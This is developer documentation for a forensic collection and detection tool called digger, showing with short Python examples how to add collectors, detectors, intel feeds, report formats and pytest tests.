Extending digger Write a new collector, detector, framework, or intel feed.
A new collector
Subclass Collector, set the four metadata fields, yield
artifacts from collect(), and register the class.
--- digger/collectors/macos/my_collector.py ---
from typing import Iterable
from digger.core.collector import Collector
from digger.core.evidence import Artifact
from digger.core.platform import OS
class SafariWebsiteDataCollector(Collector):
name = "macos.safari_website_data"
category = "browser"
supported_os = (OS.MACOS,)
requires_admin = False
description = "Safari WebKit website data plist."
def collect(self) -> Iterable[Artifact]:
from pathlib import Path
p = Path.home() / "Library/Safari/WebsiteData.plist"
if not p.exists():
return
try:
data = p.read_bytes()
except (PermissionError, OSError):
return
yield self.make(
subject=str(p),
path=str(p),
size=len(data),
)
Register in digger/collectors/__init__.py in the appropriate
OS-specific list:
def _macos() -> list[Collector]:
...
from digger.collectors.macos.my_collector import SafariWebsiteDataCollector
return [
...,
SafariWebsiteDataCollector(),
]
Graceful degradation. A collector that can't read what it needs should yield nothing and return — never raise. Wrap risky calls intry/except (PermissionError, OSError, subprocess.SubprocessError). Checkshutil.which()before shelling out.
A new detector
--- digger/detectors/my_detector.py ---
from typing import Iterable
from digger.core.evidence import EvidenceStore, Finding
from digger.detectors.base import Detector
class CrontabCommentDetector(Detector):
name = "crontab_comment_anomaly"
description = "Crontab entries with unusual commenting patterns."
def detect(self, store: EvidenceStore) -> Iterable[Finding]:
for art in store.iter_artifacts(collector="linux.cron"):
contents = art["data"].get("contents") or ""
if "###" in contents or "@@" in contents:
yield Finding(
detector=self.name,
severity="low",
title=f"Unusual comment style in {art['subject']}",
summary="Crontab uses comment markers (###/@@) atypical for the system.",
artifact_refs=[art["artifact_uuid"]],
evidence={"path": art["data"].get("path")},
mitre="T1053.003",
)
Register in digger/detectors/__init__.py:all_detectors(). Order
mostly doesn't matter, but keep TimelineBuilder last.
Data-driven detector
If your detector logic is "match a list of patterns/signatures," put the
patterns in YAML under digger/rules/<topic>/<file>.yaml
and load them via the shared helpers:
from digger.detectors._rules_io import load_yaml, load_intel
rules = load_yaml("my_topic/my_rules.yaml") # bundled file
live = load_intel("my_feed_name") # live intel cache (None if empty)
This pattern is used by shai_hulud, supply_chain,
c2, and threat_actor. It keeps the rule data
auditable and updatable without touching code.
A new intel feed
Add an entry to the FEEDS list in
digger/intel/feeds.py:
FEEDS.append(Feed(
name="my_corp_blocklist",
url="https://intel.corp.example/blocklist.txt",
interval=3600, # poll hourly
parser=parse_lines, # uses bundled helper
description="Internal IP blocklist maintained by corp SOC.",
headers={"Authorization": "Bearer XXXXX"}, # if needed
))
Parsers receive raw bytes and return a JSON-serializable dict. Existing parsers cover JSON, CSV, Spamhaus-DROP-style, and one-per-line text; write your own if needed.
Detectors load the cache by name:
from digger.detectors._rules_io import load_intel
bl = load_intel("my_corp_blocklist") or {}
bad_ips = set(bl.get("entries", []))
for art in store.iter_artifacts(collector="network"):
raddr = art["data"].get("raddr")
if raddr and raddr[0] in bad_ips:
yield Finding(...)
A new compliance framework
Drop a YAML file under digger/compliance/frameworks/. See the
Compliance page for the predicate vocabulary
and an example. No code change required — digger compliance list
discovers it automatically.
A new report format
Reports are pure functions: render_X(store: EvidenceStore) -> str.
Drop a module under digger/report/, expose render_…,
wire it into digger/report/__init__.py and into
cli.py:cmd_report's renderers dict.
A new exporter
Same pattern: pure function over the evidence store under
digger/exchange/, plus a CLI sub-command in
cli.py. Use digger/tradecraft/tlp.py's
apply_tlp_filter() to respect sharing markings.
Tests
Drop tests under tests/ (filename test_*.py).
The harness is plain pytest, no fixtures or plugins required. For collector
and detector tests, build a temporary EvidenceStore on a
tmp_path, seed it with synthetic artifacts, and assert on the
emitted findings.
def test_my_detector_catches_x(tmp_path):
from digger.core import Artifact, EvidenceStore
store = EvidenceStore(tmp_path)
store.add_artifact(Artifact(collector="processes", category="process",
subject="pid=1", data={"name": "evil"}))
n = MyDetector().run(store)
assert n >= 1
assert any("evil" in f["title"] for f in store.iter_findings())
store.close()
Run with:
python -m pytest tests/test_my_module.py